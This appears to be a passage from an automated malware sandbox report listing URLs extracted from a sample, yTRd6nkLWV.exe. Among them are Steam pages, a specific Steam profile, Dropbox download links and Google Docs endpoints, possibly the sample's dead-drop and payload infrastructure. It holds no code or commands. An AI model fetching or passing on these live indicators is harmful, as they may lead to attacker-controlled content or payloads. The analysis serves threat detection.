              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/j
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=BFN_
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: yTRd6nkLWV.exeString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stic
              Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: yTRd6nkLWV.exe | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJEl
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=iUcMsAN_acD6&l=e
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&am
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: yTRd6nkLWV.exe | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsi
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: yTRd6nkLWV.exe | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsiv
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: yTRd6nkLWV.exe | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dl-web.dropbox.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/fsip/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/fsip/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/fsip/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.sandbox.google.com/document/fsip/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docsend.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1597973358.000000000067D000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1598954427.0000000000680000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dropbox.com/n
Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: yTRd6nkLWV.exe, 00000001.00000003.1471466435.00000000033DA000.00000004.00000800.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1471310871.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://experience.dropbox.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.dr | String found in binary or memory: https://forums.dropbox.com
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://help.dropbox.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.c
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://login.yahoo.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://navi.dropbox.jp/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://officeapps-df.live.com
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://officeapps.live.com
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/picker
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pal-test.adyen.com
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paper.dropbox.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://photos.dropbox.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://sales.dropboxbusiness.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://showcase.dropbox.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
Source: yTRd6nkLWV.exe, 00000001.00000002.1599818334.0000000000710000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599889207.0000000000724000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.0000000000725000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597828981.000000000070F000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp, 0A8O8L4RV6JWV8ND8.exe.1.dr | String found in binary or memory: https://status.dropbox.com
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
Source: yTRd6nkLWV.exe, 00000001.00000003.1598280172.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamai
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457509468.000000000067A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1468355101.0000000000675000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
Source: yTRd6nkLWV.exe | String found in binary or memory: https://store.steampowe
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
Source: yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
Source: yTRd6nkLWV.exe, yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1457509468.0000000000674000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: yTRd6nkLWV.exe, 00000001.00000003.1457478603.0000000000703000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: yTRd6nkLWV.exe, 00000001.00000003.1502333054.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: yTRd6nkLWV.exe, 00000001.00000002.1599483403.00000000006C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com/
Source: yTRd6nkLWV.exe, 00000001.00000003.1597973358.000000000069D000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599349700.0000000000694000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000003.1597973358.0000000000693000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1599349700.00000000006A6000.00000004.00000020.00020000.00000000.sdmp, yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com/cd/0/get/CiJJBY9fg1s-lnZensg4nW2mGy-2
Source: yTRd6nkLWV.exe, 00000001.00000003.1502839435.000000000339A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: yTRd6nkLWV.exe | String found in binary or memory: https://www.certum.pl/CPS0
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.docsend.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/
Source: yTRd6nkLWV.exe, 00000001.00000002.1602275100.0000000003438000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic
